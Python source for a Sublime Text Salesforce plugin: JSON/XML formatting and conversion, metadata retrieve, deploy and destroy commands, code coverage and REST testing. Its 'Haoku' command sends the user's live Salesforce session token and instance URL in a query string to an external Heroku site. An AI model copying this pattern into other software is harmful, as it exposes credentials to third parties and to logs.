class Haoku(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(Haoku, self).__init__(*args, **kwargs)
def run(self, router=""):
settings = context.get_settings()
session = util.get_session_info(settings)
if not session:
Printer.get("error").write("Please Login Firstly")
return
heroku_host = "https://haoku.herokuapp.com"
# heroku_host = "http://localhost:3000"
show_params = {
"accessToken": session["session_id"],
"instanceUrl": session["instance_url"],
"username": settings["username"],
"router": router
}
show_params = urllib.parse.urlencode(show_params)
open_url = heroku_host + '?%s' % show_params
util.open_with_browser(open_url)
class BaseSelection(object):
def is_enabled(self):
if not self.view.size(): return False
self.selection = self.view.substr(self.view.sel()[0])
self.choose_all = False
if not self.selection:
self.choose_all = True
self.selection = self.view.substr(sublime.Region(0,
self.view.size()))
return True
class BuildCustomLabelsMetadata(sublime_plugin.TextCommand):
def run(self, edit):
try:
file_name = self.view.file_name()
lables_metadata = util.build_metadata(file_name, {
"root": "CustomLabels",
"leaf": "labels",
"xmlNodes": [
"shortDescription", "fullName",
"categories", "protected",
"language", "value"
]
})
formatter = xmlformatter.Formatter(indent=4)
lables_metadata = formatter.format_string(lables_metadata)
except ValueError as ve:
return Printer.get('error').write(str(ve))
view = sublime.active_window().new_file()
view.set_syntax_file("Packages/XML/XML.tmLanguage")
view.run_command("new_view", {
"name": "CustomLabels.labels",
"input": lables_metadata.decode("utf-8")
})
class BuildCustomLabelsTranslationMetadata(sublime_plugin.TextCommand):
def run(self, edit):
try:
file_name = self.view.file_name()
translations = util.build_metadata(file_name, {
"root": "Translations",
"leaf": "customLabels",
"xmlNodes": ["name", "label"]
})
formatter = xmlformatter.Formatter(indent=4)
translations = formatter.format_string(translations)
except ValueError as ve:
raise ve
return Printer.get('error').write(str(ve))
view = sublime.active_window().new_file()
view.set_syntax_file("Packages/XML/XML.tmLanguage")
view.run_command("new_view", {
"name": "Translations.translation",
"input": translations.decode("utf-8")
})
class JsonFormat(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
formatted_json = json.dumps(json.loads(self.selection),
ensure_ascii=False, indent=4)
except ValueError as ve:
return Printer.get('error').write(str(ve))
if not self.choose_all:
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "FormattedJSON",
"input": formatted_json
})
else:
self.view.window().run_command("new_dynamic_view", {
"view_id": self.view.id(),
"view_name": self.view.name(),
"point": 0,
"erase_all": True,
"input": formatted_json
})
class JsonSerialization(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
self.data = json.loads(self.selection)
except ValueError as ve:
return Printer.get('error').write(str(ve))
if not self.choose_all:
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "SerializedJSON",
"input": json.dumps(self.data)
})
else:
self.view.window().run_command("new_dynamic_view", {
"view_id": self.view.id(),
"view_name": self.view.name(),
"point": 0,
"erase_all": True,
"input": json.dumps(self.data)
})
class JsonToApex(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
self.data = json.loads(self.selection)
except ValueError as ve:
return Printer.get('error').write(str(ve))
sublime.active_window().show_input_panel("Input Class Name: ",
"JSON2Apex", self.on_input_name, None, None)
def on_input_name(self, name):
if not name: name = "JSON2Apex"
# Start converting
snippet = JSONConverter(scope="global").convert2apex(name, self.data).snippet
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "JSON2APEX",
"input": snippet
})
class JsonToXml(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
data = json.loads(self.selection)
result = xmltodict.unparse(data)
except ValueError as ve:
return Printer.get("error").write(str(ve))
except xml.parsers.expat.ExpatError as ex:
return Printer.get("error").write(str(ex))
new_view = sublime.active_window().new_file()
new_view.set_syntax_file("Packages/XML/XML.tmLanguage")
new_view.run_command("new_view", {
"name": "JSON2XML",
"input": util.format_xml(result).decode("UTF-8")
})
class JsonToCsv(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
_list = json.loads(self.selection)
if not isinstance(_list, list):
msg = "Your input is not valid json list"
return Printer.get("error").write(msg)
except ValueError as ve:
return Printer.get("error").write(str(ve))
except xml.parsers.expat.ExpatError as ex:
return Printer.get("error").write(str(ex))
new_view = sublime.active_window().new_file()
new_view.run_command("new_view", {
"name": "JSON2CSV.csv",
"input": util.json2csv(_list)
})
class XmlToJson(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
result = xmltodict.parse(self.selection)
except xml.parsers.expat.ExpatError as ex:
message = "You should open a XML file or choose any valid XML content"
if "line 1, column 0" in str(ex):
return Printer.get("error").write(message)
return Printer.get("error").write(str(ex))
new_view = sublime.active_window().new_file()
new_view.run_command("new_view", {
"name": "XML2JSON",
"input": json.dumps(result, indent=4)
})
class XmlFormat(BaseSelection, sublime_plugin.TextCommand):
def run(self, edit):
try:
formatter = xmlformatter.Formatter(indent=4)
formatted_xml = formatter.format_string(self.selection)
except xml.parsers.expat.ExpatError as ex:
message = "You should open a XML file or choose any valid XML content"
if "line 1, column 0" in str(ex):
return Printer.get("error").write(message)
return Printer.get("error").write(str(ex))
if not self.choose_all:
new_view = sublime.active_window().new_file()
new_view.set_syntax_file("Packages/XML/XML.tmLanguage")
new_view.run_command("new_view", {
"name": "XMLFormat",
"input": formatted_xml.decode("utf-8")
})
else:
self.view.window().run_command("new_dynamic_view", {
"view_id": self.view.id(),
"view_name": self.view.name(),
"point": 0,
"erase_all": True,
"input": formatted_xml.decode("utf-8")
})
class DiffWithServer(sublime_plugin.TextCommand):
def run(self, edit, switch=True, source_org=None):
if not source_org:
source_org = self.settings["default_project_name"]
if switch:
return self.view.window().run_command("switch_project", {
"callback_options": {
"callback_command": "diff_with_server",
"args": {
"switch": False,
"source_org": source_org
}
}
})
file_name = self.view.file_name()
attr = util.get_component_attribute(file_name, False, reload_cache=True)[0]
# If this component is not exist in chosen project, just stop
if not attr:
Printer.get("error").write("This component is not exist in chosen project")
return util.switch_project(source_org)
processor.handle_diff_with_server(attr, file_name, source_org)
def is_enabled(self):
self.file_name = self.view.file_name()
if not self.file_name:
return False
self.settings = context.get_settings()
self.attributes = util.get_file_attributes(self.file_name)
if self.attributes["metadata_folder"] not in ["classes", "triggers", "pages", "components"]:
return False
return True
def is_visible(self):
return self.is_enabled()
class DiffWithOtherFile(sublime_plugin.TextCommand):
def run(self, edit):
self.other_open_files = []
for v in self.views:
if v.id() != self.view.id():
if not v.file_name():
continue
self.other_open_files.append(v.file_name())
sublime.active_window().show_quick_panel(self.other_open_files, self.on_done, 1)
def on_done(self, index):
if index == -1:
return
from .salesforce.lib import diff
diff.diff_files(self.view.file_name(), self.other_open_files[index])
def is_enabled(self):
self.views = sublime.active_window().views()
return len(self.views) > 1
def is_visible(self):
view = sublime.active_window().active_view()
return view.file_name() is not None
class ShowMyPanel(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ShowMyPanel, self).__init__(*args, **kwargs)
def run(self, panel):
Printer.get(panel).show_panel()
class ToggleMetadataObjects(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ToggleMetadataObjects, self).__init__(*args, **kwargs)
def run(self, callback_options={}):
self.settings = context.get_settings()
self.callback_options = callback_options
described_metadata = util.get_described_metadata(self.settings)
if not described_metadata:
return self.window.run_command("describe_metadata", {
"callback_options": {
"callback_command": "toggle_metadata_objects"
}
})
self.metadata_objects = described_metadata["metadataObjects"]
smo = self.settings["subscribed_metadata_objects"]
# Key pair between item and metdataObjects
self.item_property = {}
# Add all metadata objects to list
has_subscribed = False
subscribed_items = []
unsubscripted_items = []
for mo in self.metadata_objects:
if mo["xmlName"] in smo:
item = "%s[√] %s" % (" " * 4, mo["xmlName"])
subscribed_items.append(item)
has_subscribed = True
else:
item = "%s[x] %s" % (" " * 4, mo["xmlName"])
unsubscripted_items.append(item)
self.item_property[item] = mo["xmlName"]
# Add item `Select All` to list
item_all = "[%s] All" % ("√" if has_subscribed else "x")
self.items = [item_all]
self.item_property[item_all] = [m["xmlName"] for m in self.metadata_objects]
# Add subscribed ones and unsubscribed ones to list
self.items.extend(sorted(subscribed_items))
self.items.extend(sorted(unsubscripted_items))
self.window.show_quick_panel(self.items, self.on_done,
sublime.MONOSPACE_FONT)
def on_done(self, index):
if index == -1:
if "callback_command" in self.callback_options:
self.window.run_command(self.callback_options["callback_command"])
return
# Get chosen type
chosen_item = self.items[index]
chosen_metadata_objects = self.item_property[chosen_item]
# Get already subscribed metadata objects
s = sublime.load_settings(context.TOOLING_API_SETTINGS)
projects = s.get("projects")
default_project = projects[self.settings["default_project_name"]]
if "subscribed_metadata_objects" in default_project:
subscribed_metadata_objects = default_project["subscribed_metadata_objects"]
else:
subscribed_metadata_objects = []
# Assign new subscribed metadata objects to subscribed list
if isinstance(chosen_metadata_objects, list):
# If already subscribed all, and we click choose all item,
# all subscribed ones will be unsubscripted
if len(subscribed_metadata_objects) == len(self.metadata_objects):
subscribed_metadata_objects = []
else:
subscribed_metadata_objects = chosen_metadata_objects
elif isinstance(chosen_metadata_objects, str):
if chosen_metadata_objects in subscribed_metadata_objects:
subscribed_metadata_objects.remove(chosen_metadata_objects)
else:
subscribed_metadata_objects.append(chosen_metadata_objects)
default_project["subscribed_metadata_objects"] = subscribed_metadata_objects
projects[self.settings["default_project_name"]] = default_project
# Save the updated settings
s.set("projects", projects)
sublime.save_settings(context.TOOLING_API_SETTINGS)
sublime.set_timeout(lambda: sublime.active_window().run_command("toggle_metadata_objects", {
"callback_options": self.callback_options
}), 10)
class ReloadSobjectCacheCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ReloadSobjectCacheCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Are you sure you really want to update sObject cache?"
if not sublime.ok_cancel_dialog(message, "Confirm Reload?"): return
processor.handle_reload_sobjects_completions()
class ReloadSymbolTableCacheCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ReloadSymbolTableCacheCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Are you sure you really want to reload symbol table cache?"
if not sublime.ok_cancel_dialog(message, "Confirm Reload"):
return
processor.handle_reload_symbol_tables()
class ClearSessionCacheCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ClearSessionCacheCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Are you sure you really want to clear session?"
if not sublime.ok_cancel_dialog(message, "Confirm Clear?"): return
settings = context.get_settings()
session_path = settings["workspace"] + "/.config/session.json"
try:
os.remove(session_path)
sublime.status_message("Session cache is cleared")
except:
sublime.status_message("Session cache clear failed")
class ClearCacheCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ClearCacheCommand, self).__init__(*args, **kwargs)
def run(self, cache_name):
self.cache_name = cache_name
self.cache_settings = self.cache_name + ".sublime-settings"
self.caches = util.get_sobject_caches(self.cache_settings)
if not self.caches:
Printer.get('error').write("No cache already")
return
self.window.show_quick_panel(self.caches, self.on_done)
def on_done(self, index):
if index == -1: return
message = "Are you sure you really want to clear this cache?"
if not sublime.ok_cancel_dialog(message, "Confirm Clear"): return
util.clear_cache(self.caches[index][1], self.cache_settings)
sublime.set_timeout(lambda: sublime.active_window().run_command("clear_cache", {
"cache_name": self.cache_name
}), 10)
class Convert15Id218Id(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(Convert15Id218Id, self).__init__(*args, **kwargs)
def run(self):
self.window.show_input_panel("Input 15 Id: ",
"", self.on_input, None, None)
def on_input(self, input):
c18Id = util.convert_15_to_18(input)
Printer.get('log').write("Converted 18 Digit Id: " + c18Id);
class DecodeUrl(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DecodeUrl, self).__init__(*args, **kwargs)
def run(self):
self.window.show_input_panel("Input your URL to be decoded: ",
"", self.on_input, None, None)
def on_input(self, input):
decodedUrl = urllib.request.unquote(input)
Printer.get('log').write("Decoded URL: " + decodedUrl);
class EncodeUrl(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(EncodeUrl, self).__init__(*args, **kwargs)
def run(self):
self.window.show_input_panel("Input your URL to be encoded: ",
"", self.on_input, None, None)
def on_input(self, input):
encodedUrl = urllib.request.quote(input)
Printer.get('log').write("Encoded URL: " + encodedUrl);
class GenerateSoqlCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(GenerateSoqlCommand, self).__init__(*args, **kwargs)
def run(self):
sobjects_describe = util.populate_sobjects_describe()
self.sobjects = sorted(sobjects_describe.keys())
self.window.show_quick_panel(self.sobjects, self.on_done)
def on_done(self, index):
if index == -1: return
self.sobject = self.sobjects[index]
self.filters = ["all", "updateable", "createable", "custom"]
self.display_filters = [a.capitalize() for a in self.filters]
sublime.set_timeout(lambda: self.window.show_quick_panel(self.display_filters, self.on_choose_action), 10)
def on_choose_action(self, index):
if index == -1: return
processor.handle_generate_sobject_soql(self.sobject, self.filters[index])
class ExportQueryToCsv(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportQueryToCsv, self).__init__(*args, **kwargs)
def run(self, tooling=False):
self.tooling = tooling
sublime.active_window().show_input_panel('Input Your %s SOQL:' %
('Tooling' if tooling else ''), "", self.on_input_soql, None, None)
def on_input_soql(self, soql):
self.soql = soql.strip()
# Check whether the soql is valid and not parent-to-child query
match = re.match("[\\n\\s]*SELECT\\s+[*\\w\\n,.:_\\s()]+?\\s+FROM\\s+[1-9_a-zA-Z]+",
self.soql, re.IGNORECASE)
if not match:
Printer.get("error").write("Your input SOQL is not valid")
if sublime.ok_cancel_dialog("Want to try again?"):
self.window.show_input_panel('Input Your SOQL:',
"", self.on_input_soql, None, None)
return
# This feature does not support parent to child query
matchs = re.findall('SELECT\\s+', match.group(0), re.IGNORECASE)
if len(matchs) > 1:
Printer.get("error").write("This feature does not support parent-to-child query")
if sublime.ok_cancel_dialog("Want to try again?"):
self.window.show_input_panel('Input Your SOQL:',
"", self.on_input_soql, None, None)
return
# Parse the sObject Name for CSV name
matchstr = match.group(0)
self.sobject = matchstr[matchstr.rfind(" ") + 1:]
sublime.active_window().show_input_panel('Input CSV Name:',
self.sobject, self.on_input_name, None, None)
def on_input_name(self, name):
if not name: return
processor.handle_export_query_to_csv(self.tooling, self.soql, name)
class ExportDataTemplateCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportDataTemplateCommand, self).__init__(*args, **kwargs)
def run(self, vertical=True):
self.vertical = vertical
self.sobject_recordtypes_attr = processor.populate_sobject_recordtypes()
if not self.sobject_recordtypes_attr: return # Network Issue Cause
self.sobject_recordtypes = sorted(list(self.sobject_recordtypes_attr.keys()))
self.window.show_quick_panel(self.sobject_recordtypes, self.on_choose_recordtype)
def on_choose_recordtype(self, index):
if index == -1: return
# Get chosen item, sobject name and recordtype id
sobject_recordtype = self.sobject_recordtypes[index]
sobject = sobject_recordtype.split(",")[0].strip()
recordtype_name = sobject_recordtype.split(",")[1].strip()
recordtype_id = self.sobject_recordtypes_attr[sobject_recordtype]
# handle this describe request
processor.handle_export_data_template_thread(sobject,
recordtype_name, recordtype_id, self.vertical)
def is_enabled(self):
return util.check_action_enabled()
class ExecuteRestTest(sublime_plugin.TextCommand):
def run(self, edit):
self.items = ["Get", "Post", "Put", "Patch", "Delete", "Tooling Query",
"Query", "Query All", "Search", "Quick Search",
"Head", "Retrieve Body"]
self.view.show_popup_menu(self.items, self.on_choose_action),
def on_choose_action(self, index):
if index == -1: return
self.chosen_action = self.items[index]
if self.chosen_action in ["Post", "Put", "Patch"]:
self.view.window().show_input_panel("Input JSON Body: ", "", self.on_input, None, None)
else:
processor.handle_execute_rest_test(self.chosen_action, self.sel)
def on_input(self, data):
try:
data = json.loads(data) if data else None
except ValueError as ve:
Printer.get('error').write(str(ve))
if not sublime.ok_cancel_dialog("Do you want to try again?", "Yes?"): return
self.view.window().show_input_panel("Input JSON Body: ",
"", self.on_input, None, None)
return
processor.handle_execute_rest_test(self.chosen_action, self.sel, data)
def is_enabled(self):
self.sel = self.view.substr(self.view.sel()[0])
if not self.sel: return False
return True
class GotoComponentCommand(sublime_plugin.TextCommand):
"""
Move the cursor to the class name, press shift key and double click left mouse,
the class file will be open, you can custom the bind key in mousemap path
"""
def run(self, edit, is_background=False, allowed_folders=None):
sel = self.view.sel()[0]
sel_text = self.view.substr(self.view.word(sel.begin()))
settings = context.get_settings()
for ct in settings["subscribed_metadata_objects"]:
if "suffix" not in settings[ct]:
continue
suffix = settings[ct]["suffix"]
folder = settings[ct]["directoryName"]
target_file = os.path.join(settings["workspace"] + \
"/src/%s/%s.%s" % (folder, sel_text, suffix)
)
if os.path.isfile(target_file):
if allowed_folders:
if folder in allowed_folders:
self.view.window().open_file(target_file)
else:
self.view.window().open_file(target_file)
else:
sublime.status_message("You may forget to download the code")
if is_background: self.view.window().focus_view(self.view)
class SetCheckPointCommand(sublime_plugin.TextCommand):
def run(self, edit, mark):
sel = [s for s in self.view.sel()]
self.view.add_regions(mark, sel, "invalid", "dot",
sublime.DRAW_SOLID_UNDERLINE | sublime.DRAW_EMPTY_AS_OVERWRITE)
class RemoveCheckPointCommand(sublime_plugin.TextCommand):
def run(self, edit, mark):
self.view.erase_regions(mark)
class ViewCodeCoverageCommand(sublime_plugin.TextCommand):
def run(self, edit):
processor.handle_fetch_code_coverage(self.attributes["name"], self.body)
def is_enabled(self):
# Must Be File
if not self.view.file_name():
return False
self.file_name = self.view.file_name()
# Must be valid component
if not util.check_enabled(self.file_name):
return False
# Must be class or trigger
self.attributes = util.get_file_attributes(self.file_name)
if not self.attributes["extension"]:
return False
if self.attributes["metadata_folder"] not in ["classes", "triggers"]:
return False
# Can't be Test Class
with open(self.file_name, encoding="utf-8") as fp:
self.body = fp.read()
if "@istest" in self.body.lower():
return False
return True
def is_visible(self):
return self.is_enabled()
class ViewSelectedCodeCoverageCommand(sublime_plugin.TextCommand):
def run(self, edit):
# Keep all open views
openViewIds = [v.id() for v in sublime.active_window().views()]
# Open the related code file
self.view.run_command("goto_component", {
"is_background": False,
"allowed_folders": ["classes", "triggers"]
})
# 1. Open the view of related code file
# 2. Run command `view_code_coverage` to open coverage view
# 3. Close the view of related code file
# 4. Focus on the coverage view
view = sublime.active_window().active_view()
view.run_command("view_code_coverage")
coverage_view = sublime.active_window().active_view()
# If there is no available code file
if coverage_view.id() == view.id():
return
if view.id() not in openViewIds:
sublime.active_window().focus_view(view)
sublime.active_window().run_command("close")
# Move focus to the coverage view
sublime.active_window().focus_view(coverage_view)
class NewViewCommand(sublime_plugin.TextCommand):
"""
Create a new view with specified input
@input: user specified input
Usage:
sublime.active_window().run_command("new_view", {
"name": "ViewName",
"input": "Example"
})
"""
def run(self, edit, point=0, name="", input=""):
view = sublime.active_window().active_view()
view.set_scratch(True)
view.set_name(name)
view.insert(edit, point, input)
class NewDynamicViewCommand(sublime_plugin.TextCommand):
"""
Create a new view with specified input
@input: user specified input
Usage:
sublime.active_window().run_command("new_dynamic_view", {
"view_id": "view_id",
"point": 0,
"input": "Example"
})
"""
def run(self, edit, view_id=None, view_name="", input="", point=0, erase_all=False):
# Get the view which name match the name paramter
view = sublime.active_window().active_view()
if view_id and not view.id() == view_id:
for v in sublime.active_window().views():
if v.id() == view_id:
view = v
view.set_scratch(True)
view.set_name(view_name)
if erase_all: view.erase(edit, sublime.Region(0, view.size()))
view.insert(edit, point, input)
class RefreshFolder(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(RefreshFolder, self).__init__(*args, **kwargs)
def run(self, dirs):
message = "Are you sure you really want to refresh these folders"
if sublime.ok_cancel_dialog(message, "Refresh Folders"):
processor.handle_refresh_folder(self.types)
def is_visible(self, dirs):
if not dirs: return False
self.types = util.build_folder_types(dirs)
if not self.types: return False
return True
class RetrieveMetadataCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(RetrieveMetadataCommand, self).__init__(*args, **kwargs)
def run(self, retrieve_all=True):
message = "Are your sure you really want to continue?"
if not sublime.ok_cancel_dialog(message, "Retrieve Metadata"): return
settings = context.get_settings()
types = {}
if not retrieve_all:
types = {
"CustomObject": ["*"],
"Workflow": ["*"]
}
else:
for m in settings["all_metadata_objects"]:
types[m] = ["*"]
processor.handle_refresh_folder(types, not retrieve_all)
class RenameMetadata(sublime_plugin.TextCommand):
def run(self, edit):
self.view.window().show_input_panel("Input New Name",
self.filename, self.on_input, None, None)
def on_input(self, new_name):
if not new_name or not re.match("\w+[a-zA-Z0-9]+", new_name):
Printer.get('error').write("Input name is not valid")
return
processor.handle_rename_metadata(self.file_name, self.xml_name, self.filename, new_name)
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.settings = context.get_settings()
self.file_name = self.view.file_name()
base, filename = os.path.split(self.file_name)
base, folder = os.path.split(base)
if folder not in self.settings["all_metadata_folders"]: return False
if not util.check_enabled(self.view.file_name(), check_cache=False):
return False
self.filename = filename.split(".")[0]
self.xml_name = self.settings[folder]["xmlName"]
return True
class RetrieveFileFromServer(sublime_plugin.TextCommand):
"""
Retrieve Single File From Salesforce via Metadata API
"""
def run(self, edit, switch=True):
files = [self.view.file_name()]
sublime.active_window().run_command("retrieve_files_from_server", {
"files": files,
"switch": switch
})
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.settings = context.get_settings()
attributes = util.get_file_attributes(self.view.file_name())
metadata_folder = attributes["metadata_folder"]
if metadata_folder not in self.settings["all_metadata_folders"]: return False
if not util.check_enabled(self.view.file_name(), check_cache=False):
return False
return True
def is_visible(self):
return self.is_enabled()
class RetrieveFilesFromServer(sublime_plugin.WindowCommand):
"""
Retrieve List of files from Salesforce via Metadata API
"""
def __init__(self, *args, **kwargs):
super(RetrieveFilesFromServer, self).__init__(*args, **kwargs)
def run(self, files, switch=True, source_org=None, confirmed=False, extract_to=None):
# Prevent duplicate confirmation
if not confirmed:
_message = "Confirm retrieving %s from server?" % (
"these files" if len(files) > 1 else "this file"
)
if not sublime.ok_cancel_dialog(_message, "Confirm?"):
return
settings = context.get_settings()
if not extract_to:
extract_to = settings["workspace"]
if switch:
return self.window.run_command("switch_project", {
"callback_options": {
"callback_command": "retrieve_files_from_server",
"args": {
"files": files,
"switch": False,
"source_org": settings["default_project_name"],
"confirmed": True,
"extract_to": extract_to
}
}
})
types = {}
for _file in files:
attributes = util.get_file_attributes(_file)
name = attributes["name"]
metadata_folder = attributes["metadata_folder"]
metadata_object_attr = settings[metadata_folder]
metadata_object = metadata_object_attr["xmlName"]
# If file is in folder, we need to add folder/
if metadata_object_attr["inFolder"] == "true":
name = "%s/%s" % (attributes["folder"], attributes["name"])
# If file is AuraDefinitionBundle, we need to add folder
if metadata_folder in ["aura", "lwc"]:
name = "%s" % attributes["folder"]
if metadata_object in types:
types[metadata_object].append(name)
else:
types[metadata_object] = [name]
processor.handle_retrieve_package(types, extract_to,
source_org=source_org, ignore_package_xml=True)
def is_visible(self, files):
if not files:
return False
settings = context.get_settings()
for _file in files:
if not os.path.isfile(_file):
continue # Ignore folder
metadata_folder = util.get_metadata_folder(_file)
if metadata_folder not in settings["all_metadata_folders"]: return False
if not util.check_enabled(_file, check_cache=False):
return False
return True
class CancelDeployment(sublime_plugin.TextCommand):
def run(self, edit):
processor.handle_cancel_deployment_thread(self.sel_text)
def is_enabled(self):
if len(self.view.sel()) == 0:
return False
region = self.view.sel()[0]
self.sel_text = self.view.substr(self.view.word(region.begin()))
return self.sel_text.startswith("0Af")
class DestructFileFromServer(sublime_plugin.TextCommand):
"""
Destruct the selected code from Salesforce and delete from local folder
"""
def run(self, edit):
files = [self.view.file_name()]
sublime.active_window().run_command("destruct_files_from_server", {
"files": files
})
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.settings = context.get_settings()
metadata_folder = util.get_metadata_folder(self.view.file_name())
if metadata_folder not in self.settings["all_metadata_folders"]: return False
if not util.check_enabled(self.view.file_name(), check_cache=False):
return False
return True
def is_visible(self):
return self.is_enabled()
class DestructFilesFromServer(sublime_plugin.WindowCommand):
"""
Destruct the selected code files from Salesforce and delete from local folder via Metadata API
"""
def __init__(self, *args, **kwargs):
super(DestructFilesFromServer, self).__init__(*args, **kwargs)
def run(self, files):
_message = "Confirm destructing %s from server?" % (
"these files" if len(files) > 1 else "this file"
)
if sublime.ok_cancel_dialog(_message, "Confirm"):
processor.handle_destructive_files(files)
def is_visible(self, files):
if len(files) == 0: return False
self.settings = context.get_settings()
for _file in files:
if not os.path.isfile(_file):
continue # Ignore folder
_folder = util.get_metadata_folder(_file)
if _folder not in self.settings["all_metadata_folders"]: return False
if not util.check_enabled(_file, check_cache=False):
return False
return True
class DeployZip(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DeployZip, self).__init__(*args, **kwargs)
def run(self, zipfile_path=None, chosen_classes=[]):
self.zipfile_path = zipfile_path
self.chosen_classes = chosen_classes
if self.zipfile_path:
return self.execute_deploy()
path = sublime.get_clipboard()
if not path or not os.path.isfile(path): path = ""
if not path.endswith("zip"): path = ""
self.window.show_input_panel("Input Zip File Path:",
path, self.on_input, None, None)
def on_input(self, zipfile_path):
if not zipfile_path.endswith('.zip'):
return Printer.get("error").write("Invalid Zip File")
self.zipfile_path = zipfile_path
# Start deployment
self.execute_deploy()
def execute_deploy(self):
settings = context.get_settings()
deploy_options = settings["deploy_options"]
testLevel = deploy_options.get("testLevel", "NoTestRun")
if testLevel == "RunSpecifiedTests" and not self.chosen_classes:
return self.window.run_command("choose_test_classes", {
"callback_options": {
"callback_command": "deploy_zip",
"args": {
"zipfile_path": self.zipfile_path,
"chosen_classes": self.chosen_classes
}
}
})
processor.handle_deploy_thread(util.base64_encode(self.zipfile_path),
chosen_classes=self.chosen_classes)
class DeployOpenFilesToServer(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DeployOpenFilesToServer, self).__init__(*args, **kwargs)
def run(self, select_all=True):
# If deploy all open files
if select_all:
return sublime.active_window().run_command("deploy_files_to_server",
{"files": list(self.file_attributes.values())})
# If just deploy some files
if not hasattr(self, "chosen_files"):
self.chosen_files = []
self.populate_items()
self.window.show_quick_panel(self.items, self.on_choose)
def populate_items(self):
self.items = []
for fileName in list(self.file_attributes.keys()):
if fileName in self.chosen_files:
self.items.append("[√] %s" % fileName)
else:
self.items.append("[x] %s" % fileName)
def on_choose(self, index):
if index == -1:
chosen_files = []
for item in self.items:
if item.startswith("[√] "):
chosen_files.append(self.file_attributes[item[4:]])
if chosen_files:
sublime.active_window().run_command("deploy_files_to_server",
{"files": chosen_files}
)
return
# Get chosen file name
chosen_item = self.items[index]
chosen_file_name = chosen_item[4:]
# Add or remove chosen file from list
if chosen_file_name in self.chosen_files:
self.chosen_files.remove(chosen_file_name)
else:
self.chosen_files.append(chosen_file_name)
# Start next round
self.populate_items()
sublime.set_timeout(lambda: self.window.show_quick_panel(self.items,
self.on_choose, sublime.MONOSPACE_FONT), 10)
def is_enabled(self):
"""
1. You must have selected one file or more
2. All selected file should be in predefined meta folders
"""
# If no views, just disable this command
views = sublime.active_window().views();
if not views or len(views) == 0: return False
self.settings = context.get_settings()
self.file_attributes = {};
for _view in views:
_file = _view.file_name()
# Ignore folder
if not _file or not os.path.isfile(_file):
continue
attributes = util.get_file_attributes(_file)
# Ignore non-sfdc files
if attributes["metadata_folder"] not in self.settings["all_metadata_folders"]:
continue
self.file_attributes[attributes["fullName"]] = _file
# If there is no sfdc code file, just disable this command
if not self.file_attributes:
return False
return True
class DeployFileToServer(sublime_plugin.TextCommand):
def run(self, edit, switch=True):
files = [self.view.file_name()]
sublime.active_window().run_command("deploy_files_to_server", {
"files": files, "switch": switch
})
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.settings = context.get_settings()
attributes = util.get_file_attributes(self.view.file_name())
if attributes["metadata_folder"] not in self.settings["all_metadata_folders"]:
return False
return True
def is_visible(self):
return self.is_enabled()
class DeployFileToThisServer(sublime_plugin.TextCommand):
"""
Deploy a opened file to current active Salesforce org
"""
def run(self, edit):
files = [self.view.file_name()]
sublime.active_window().run_command("deploy_files_to_server", {
"files": files, "switch": False
})
def is_enabled(self):
return util.check_enabled(self.view.file_name(), check_cache=False)
def is_visible(self):
return self.is_enabled()
class DeployFilesToServer(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DeployFilesToServer, self).__init__(*args, **kwargs)
def run(self, files, switch=True, source_org=None, chosen_classes=[]):
settings = context.get_settings()
if not source_org:
source_org = settings["default_project_name"]
deploy_options = settings["deploy_options"]
testLevel = deploy_options.get("testLevel", "NoTestRun")
if testLevel == "RunSpecifiedTests" and not chosen_classes:
return self.window.run_command("choose_test_classes", {
"callback_options": {
"callback_command": "deploy_files_to_server",
"args": {
"files": files,
"switch": False,
"source_org": source_org
}
}
})
if switch:
return self.window.run_command("switch_project", {
"callback_options": {
"callback_command": "deploy_files_to_server",
"args": {
"files": files,
"switch": False,
"source_org": source_org
}
}
})
# Before deploy, save files to local
# Enhancement for issue SublimeApex#67
for _file in files:
view = util.get_view_by_file_name(_file)
if not view: continue
view.run_command("save")
# Keep the files to deploy
base64_encoded_zip = util.build_deploy_package(files)
processor.handle_deploy_thread(
base64_encoded_zip,
source_org=source_org,
chosen_classes=chosen_classes
)
def is_visible(self, files):
"""
1. You must have selected one file or more
2. All selected file should be in predefined meta folders
"""
if not files: return False
self.settings = context.get_settings()
for _file in files:
if not os.path.isfile(_file): continue # Ignore folder
attributes = util.get_file_attributes(_file)
if attributes["metadata_folder"] not in self.settings["all_metadata_folders"]:
return False
return True
class CopyFileToProject(sublime_plugin.TextCommand):
def run(self, edit, switch=True, source_org=None):
sublime.active_window().run_command("copy_files_to_project", {
"files": [self.view.file_name()]
})
def is_enabled(self):
return self.view.file_name() is not None
